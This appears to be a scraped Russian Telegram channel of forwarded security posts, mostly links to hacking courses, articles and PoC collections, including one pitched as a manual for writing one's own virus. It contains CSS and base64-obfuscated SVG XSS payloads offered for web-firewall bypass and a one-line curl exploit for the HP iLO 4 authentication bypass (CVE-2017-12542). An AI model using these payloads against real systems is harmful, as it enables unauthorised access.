Forwarded from CryptoEarn
Разрабатываем собственный вирус.
Думаю будет всем полезна эта инфа, так как многие очень любят повредничать с вирусами- даю возможность, пользуйтесь мануалом.
Другая сторона медали, читайте статью, будьте в курсе, как могут к вам проникнуть, что сделать.
ЧИТАТЬ.
Думаю будет всем полезна эта инфа, так как многие очень любят повредничать с вирусами- даю возможность, пользуйтесь мануалом.
Другая сторона медали, читайте статью, будьте в курсе, как могут к вам проникнуть, что сделать.
ЧИТАТЬ.
Telegraph
Разрабатываем собственный вирус.
Хакерский мир можно условно разделить на три группы атакующих: 1) «Skids» (script kiddies) – малыши, начинающие хакеры, которые собирают известные куски кода и утилиты и используя их создают какое-то простое вредоносное ПО. 2) «Byuers» — не чистые на руку…
Полный курс по этичному взлому — от начального до продвинутого уровня Kali Linux
Рассмотрены вопросы взлома Wi-Fi, сканирования уязвимостей, анализа вредоносного ПО и эксплуатации, тестирования на проникновение и этичного хакинга.
Ссылка на плейлист: https://www.youtube.com/watch?v=r4tK4ifayF8&list=PLPxEwGlYuJQlGUzoAoZsNlSHjIgRUe9dU
Рассмотрены вопросы взлома Wi-Fi, сканирования уязвимостей, анализа вредоносного ПО и эксплуатации, тестирования на проникновение и этичного хакинга.
Ссылка на плейлист: https://www.youtube.com/watch?v=r4tK4ifayF8&list=PLPxEwGlYuJQlGUzoAoZsNlSHjIgRUe9dU
YouTube
Этичный Хакинг #1
Codeby net предоставляет своим читателям,зрителям и подписчикам учебные материалы по этичному хакингу и тестированию на проникновение с Kali Linux, Windows и других операционных систем.
Мы рассказываем об информационной безопасности, безопасности в целом…
Мы рассказываем об информационной безопасности, безопасности в целом…
Самый свежий ТОП наиболее популярных Hack-ресурсов
Блоги, статьи, книги и множество других Hack-ресурсов, которые актуальны сегодня. Хватайте свежий дайджест, пока не остыл!
https://proglib.io/p/best-hack-resources/
#digest
Блоги, статьи, книги и множество других Hack-ресурсов, которые актуальны сегодня. Хватайте свежий дайджест, пока не остыл!
https://proglib.io/p/best-hack-resources/
#digest
Библиотека программиста
Самый свежий ТОП наиболее популярных Hack-ресурсов
Блоги, статьи, книги и множество других Hack-ресурсов, которые актуальны сегодня. Хватайте свежий дайджест, пока не остыл!
30 ресурсов по безопасности, которые точно пригодятся
По мере развития индустрии специалисты по безопасности черпают все новую и новую информацию. Но как понять, что знаний достаточно?
https://proglib.io/p/information-security-guide/
#security
По мере развития индустрии специалисты по безопасности черпают все новую и новую информацию. Но как понять, что знаний достаточно?
https://proglib.io/p/information-security-guide/
#security
Библиотека программиста
30 ресурсов по безопасности, которые точно пригодятся
По мере развития индустрии специалисты по безопасности черпают все новую и новую информацию. Но как понять, что знаний достаточно?
Forwarded from Information security blog
XSS с помощью css:
<style>img{background-image:url('javascript:alert(1)')}</style>
Обход фаерволов:
<style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style>
<style>img{background-image:url('javascript:alert(1)')}</style>
Обход фаерволов:
<style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style>
Forwarded from Information security blog
«Это должно быть в общем доступе?» - статья об эксплуатации google дорков
https://goo.gl/qWK6tL
https://goo.gl/qWK6tL
Google
Personal Research Blog - Finding Leaked Sensitive Data
Forwarded from ITpro News & Reviews
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Нет, я не сошёл с ума, это я взламываю ваш IPMI iLO от HP. ж)
В открытом доступе опубликован эксплоит для уязвимости (CVE-2017-12542) в Hewlett Packard Integrated Lights-Out 4 (HP iLO 4), которая связана с обходом аутентификации и позволяет удаленно получить доступ к консоли. Воспользоваться уязвимостью достаточно просто, необходимо выполнить cURL-запрос с 29 буквами А: curl -H "Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
Четвертая версия у нас шла в серверах ProLiant Gen8 и Gen9. Проблема затрагивает только версию прошивки серверов HP iLO 4 2.53 и ниже.
PoC-эксплоиты можно посмотреть здесь, здесь, а здесь доступен модуль для Metasploit.
Решение? Обновить HP iLO до 2.54 и выше, забирать тут - http://www.hpe.com/support/ilo4
Нет, я не сошёл с ума, это я взламываю ваш IPMI iLO от HP. ж)
В открытом доступе опубликован эксплоит для уязвимости (CVE-2017-12542) в Hewlett Packard Integrated Lights-Out 4 (HP iLO 4), которая связана с обходом аутентификации и позволяет удаленно получить доступ к консоли. Воспользоваться уязвимостью достаточно просто, необходимо выполнить cURL-запрос с 29 буквами А: curl -H "Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
Четвертая версия у нас шла в серверах ProLiant Gen8 и Gen9. Проблема затрагивает только версию прошивки серверов HP iLO 4 2.53 и ниже.
PoC-эксплоиты можно посмотреть здесь, здесь, а здесь доступен модуль для Metasploit.
Решение? Обновить HP iLO до 2.54 и выше, забирать тут - http://www.hpe.com/support/ilo4
Forwarded from Information security blog
Необычный payload, закодирован в base64, может пригодится при обходе фильтра web фаервола
<svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//>
<svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//>
Кража паролей: как наши учетные записи уводят через npm-пакет
https://proglib.io/p/steal-password/
#common #security
https://proglib.io/p/steal-password/
#common #security
Forwarded from Deleted Account
Настройка UFW в Ubuntu Server 16.04 на примере BigBlueButton
UFW (Uncomplicated Firewall) – это интерфейс iptables, предназначенный для упрощения процесса настройки брандмауэра. Инструмент iptables надёжный и гибкий, но новичку будет непросто настроить его самостоятельно. Я как раз новичок в этом деле.
По умолчанию в iptables включена политика ACCEPT и выглядет это так:
Читать дальше →
Source: https://habr.com/post/420973/?utm_campaign=420973
UFW (Uncomplicated Firewall) – это интерфейс iptables, предназначенный для упрощения процесса настройки брандмауэра. Инструмент iptables надёжный и гибкий, но новичку будет непросто настроить его самостоятельно. Я как раз новичок в этом деле.
По умолчанию в iptables включена политика ACCEPT и выглядет это так:
Читать дальше →
Source: https://habr.com/post/420973/?utm_campaign=420973
Forwarded from Deleted Account
[Перевод] Курс MIT «Безопасность компьютерных систем». Лекция 7: «Песочница Native Client», часть 1
Массачусетский Технологический институт. Курс лекций #6.858. «Безопасность компьютерных систем». Николай Зельдович, Джеймс Микенс. 2014 год
Computer Systems Security — это курс о разработке и внедрении защищенных компьютерных систем. Лекции охватывают модели угроз, атаки, которые ставят под угрозу безопасность, и методы обеспечения безопасности на основе последних научных работ. Темы включают в себя безопасность операционной системы (ОС), возможности, управление потоками информации, языковую безопасность, сетевые протоколы, аппаратную защиту и безопасность в веб-приложениях.
Лекция 1: «Вступление: модели угроз» Часть 1 / Часть 2 / Часть 3
Лекция 2: «Контроль хакерских атак» Часть 1 / Часть 2 / Часть 3
Лекция 3: «Переполнение буфера: эксплойты и защита» Часть 1 / Часть 2 / Часть 3
Лекция 4: «Разделение привилегий» Часть 1 / Часть 2 / Часть 3
Лекция 5: «Откуда берутся ошибки систем безопасности» Часть 1 / Часть 2
Лекция 6: «Возможности» Часть 1 / Часть 2 / Часть 3
Лекция 7: «Песочница Native Client» Часть 1 / Часть 2 / Часть 3 Читать дальше →
Source: https://habr.com/post/418223/?utm_campaign=418223
Массачусетский Технологический институт. Курс лекций #6.858. «Безопасность компьютерных систем». Николай Зельдович, Джеймс Микенс. 2014 год
Computer Systems Security — это курс о разработке и внедрении защищенных компьютерных систем. Лекции охватывают модели угроз, атаки, которые ставят под угрозу безопасность, и методы обеспечения безопасности на основе последних научных работ. Темы включают в себя безопасность операционной системы (ОС), возможности, управление потоками информации, языковую безопасность, сетевые протоколы, аппаратную защиту и безопасность в веб-приложениях.
Лекция 1: «Вступление: модели угроз» Часть 1 / Часть 2 / Часть 3
Лекция 2: «Контроль хакерских атак» Часть 1 / Часть 2 / Часть 3
Лекция 3: «Переполнение буфера: эксплойты и защита» Часть 1 / Часть 2 / Часть 3
Лекция 4: «Разделение привилегий» Часть 1 / Часть 2 / Часть 3
Лекция 5: «Откуда берутся ошибки систем безопасности» Часть 1 / Часть 2
Лекция 6: «Возможности» Часть 1 / Часть 2 / Часть 3
Лекция 7: «Песочница Native Client» Часть 1 / Часть 2 / Часть 3 Читать дальше →
Source: https://habr.com/post/418223/?utm_campaign=418223
Forwarded from Deleted Account
[Из песочницы] Изучаем Adversarial Tactics, Techniques & Common Knowledge (ATT@CK). Часть 1
Часть 1. Вступление. Получение первоначального доступа
Данной публикацией я хотел бы начать цикл постов, посвященных описанию основных техник, применяемых злоумышленниками на различных этапах осуществления хакерских атак.
Излагаемый материал будет является свободным пересказом содержания матриц Adversarial Tactics, Techniques & Common Knowledge (ATT@CK) от компании The Mitre:
PRE-ATT&CK (техники подготовительных стадий атаки);
ATT&CK Matrix for Enterprise (техники атаки на корпоративные системы);
ATT&CK Mobile Profile (техники атак на мобильные устройства).
Читать дальше →
Source: https://habr.com/post/423405/?utm_campaign=423405
Часть 1. Вступление. Получение первоначального доступа
Данной публикацией я хотел бы начать цикл постов, посвященных описанию основных техник, применяемых злоумышленниками на различных этапах осуществления хакерских атак.
Излагаемый материал будет является свободным пересказом содержания матриц Adversarial Tactics, Techniques & Common Knowledge (ATT@CK) от компании The Mitre:
PRE-ATT&CK (техники подготовительных стадий атаки);
ATT&CK Matrix for Enterprise (техники атаки на корпоративные системы);
ATT&CK Mobile Profile (техники атак на мобильные устройства).
Читать дальше →
Source: https://habr.com/post/423405/?utm_campaign=423405
61 репозиторий для хакеров на Github
Огромная подборка полезных вещей, инструментов, книг и прочих источников для хакеров, тестировщиков на проникновение и исследователей в области информационной безопасности.
https://proglib.io/p/hacking-repositories/
Огромная подборка полезных вещей, инструментов, книг и прочих источников для хакеров, тестировщиков на проникновение и исследователей в области информационной безопасности.
https://proglib.io/p/hacking-repositories/
Библиотека программиста
61 репозиторий для хакеров на Github
Огромная подборка полезных вещей, инструментов, книг и прочих источников для хакеров, тестировщиков на проникновение и исследователей в области информационной безопасности.
Forwarded from Br0wSec (Andrey Kovalev)
Ещё одна интересная подборка PoC’ов под memory corruption уязвимости в V8 и ChakraCore (2013 - 2019): https://github.com/tunz/js-vuln-db.
GitHub
GitHub - tunz/js-vuln-db: A collection of JavaScript engine CVEs with PoCs
A collection of JavaScript engine CVEs with PoCs. Contribute to tunz/js-vuln-db development by creating an account on GitHub.
Forwarded from Deleted Account
Фингерпринтинг через рекламные баннеры? Теперь это обычное дело
Вчера на Stack Overflow задали странный вопрос: почему загрузка страницы Stack Overflow инициирует аудиоконтент? Что за звук на текстовом сайте?
Скриншот из инструментов разработчика:
Ответ оказался интереснее, чем можно было предположить.
Читать дальше →
Source: https://habr.com/ru/post/458022/?utm_campaign=458022&utm_source=habrahabr&utm_medium=rss
Вчера на Stack Overflow задали странный вопрос: почему загрузка страницы Stack Overflow инициирует аудиоконтент? Что за звук на текстовом сайте?
Скриншот из инструментов разработчика:
Ответ оказался интереснее, чем можно было предположить.
Читать дальше →
Source: https://habr.com/ru/post/458022/?utm_campaign=458022&utm_source=habrahabr&utm_medium=rss